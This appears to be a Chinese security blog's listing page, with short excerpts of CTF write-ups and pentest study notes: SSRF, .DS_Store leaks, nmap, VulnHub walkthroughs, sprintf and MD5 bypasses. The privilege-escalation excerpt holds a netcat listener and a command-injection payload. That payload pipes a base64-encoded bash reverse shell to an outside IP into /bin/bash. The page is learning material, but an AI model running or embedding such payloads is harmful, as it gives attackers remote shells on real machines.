Suzen的博客
  • 首页
  • 归档
  • 分类
  • 友链

2024第十五届极客大挑战--Web-ez_SSRF

题目来源:2024第十五届极客大挑战–ez_SSRF 源码中得不到什么信息,用dirsearch扫描目录 可以扫出/www.zip文件,访问下载到源码,有如下三个文件 先看看index.php文件,不过没啥用 123<?phpecho "Maybe you should check check some place in my website";?> 再看看
2025-04-29
漏洞笔记 > SSRF > 题目
#SSRF

DS_Store泄露

什么是.DS_Store.DS_Store 是 “Desktop Services Store” 的缩写,是 Mac OS 系统自动为每个文件夹创建的隐藏文件2。它主要用于存储文件夹的显示属性,如文件图标的摆放位置、视图设置、背景颜色等,以便让用户在下次打开文件夹时能保持之前的个性化设置 .DS_Store文件泄露由于开发/设计人员在发布代码时未删除文件夹中隐藏的.DS_store,.D
2025-04-29
漏洞笔记 > 信息搜集
#信息搜集 DS_Store泄露

NewYear CTF 2025--Web-🐍年大吉

题目网址:https://ctf.xidian.edu.cn/training/16?challenge=704 给了题目附件 app.py源码如下 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566
2025-04-29
漏洞笔记 > 文件上传 > 题目
#文件上传 源码覆盖

nmap的使用

参考文章: https://blog.csdn.net/2302_82189125/article/details/135961736 nmap的主要功能kali自带nmap,可以直接使用 主机发现: Nmap 可以通过发送网络探测包(ping 扫描)来确定一个网络中活跃的主机。这有助于确定哪些 IP 地址上有活动的设备。 端口扫描: Nmap 可以扫描目标主机的开放端口,帮助确定哪些服务正
2025-04-26
渗透 > 小知识
#渗透打靶 小知识

VulnHub靶机Earth复现

借鉴文章: https://blog.csdn.net/Czheisenberg/article/details/122900121 https://www.cnblogs.com/sainet/p/15638010.html 安装靶机靶机网址:https://www.vulnhub.com/entry/the-planets-earth,755/ VirtualBox网址:https://w
2025-04-26
渗透 > VulnHub
#渗透 打靶 复现

VulnHub靶机MoneyBox复现

借鉴文章: https://blog.csdn.net/YueXuan_521/article/details/135324089 https://blog.csdn.net/Aluxian_/article/details/128672602 安装靶机靶机网址:https://www.vulnhub.com/entry/moneybox-1,653/ VirtualBox网址:https:/
2025-04-26
渗透 > VulnHub
#渗透 打靶 复现

符号链接突破目录限制

源码如下 1234567891011<?phphighlight_file(__FILE__);require_once 'starven_secret.php';if(isset($_GET['file'])) { if(preg_match('/starven_secret.php/i', $_GET['
2025-04-25
小知识
#小知识

sprintf漏洞

sprintf函数函数功能sprintf是 PHP 中一个格式化字符串的函数,功能是根据指定的格式化字符串,将一系列参数转换并格式化为一个新的字符串 函数语法1sprintf(format, arg1, arg2,...) format:是必需参数,规定字符串以及如何格式化其中的变量,如果 format 字符串中不包含任何占位符(如 %s、%d 等),那么可以不需要额外的 arg 参数 arg
2025-04-25
小知识
#小知识

提权

用VPS反弹shell攻击机监听端口 1nc -lvp 2333 目标机 123127.0.0.1 | echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMjIuNzUuMTI2LzIzMzMgMD4mMQ== | base64 -d| /bin/bash127.0.0.1 | echo bash -i >& /dev/tcp/47.122.75.126/2
2025-04-25
小知识
#小知识

MD5绕过

123对于:(string)$_GET['md5_1'] !== (string)$_GET['md5_2'] && md5($_GET['md5_1']) === md5($_GET['md5_2'])● md5_1=%af%13%76%70%82%a0%a6%58%cb%3e%23%38%c4%c6
2025-04-25
漏洞笔记 > PHP特性
#小知识
1…45678

搜索

正在载入天数... 载入时分秒...
Hexo Fluid
总访问量 次 总访客数 人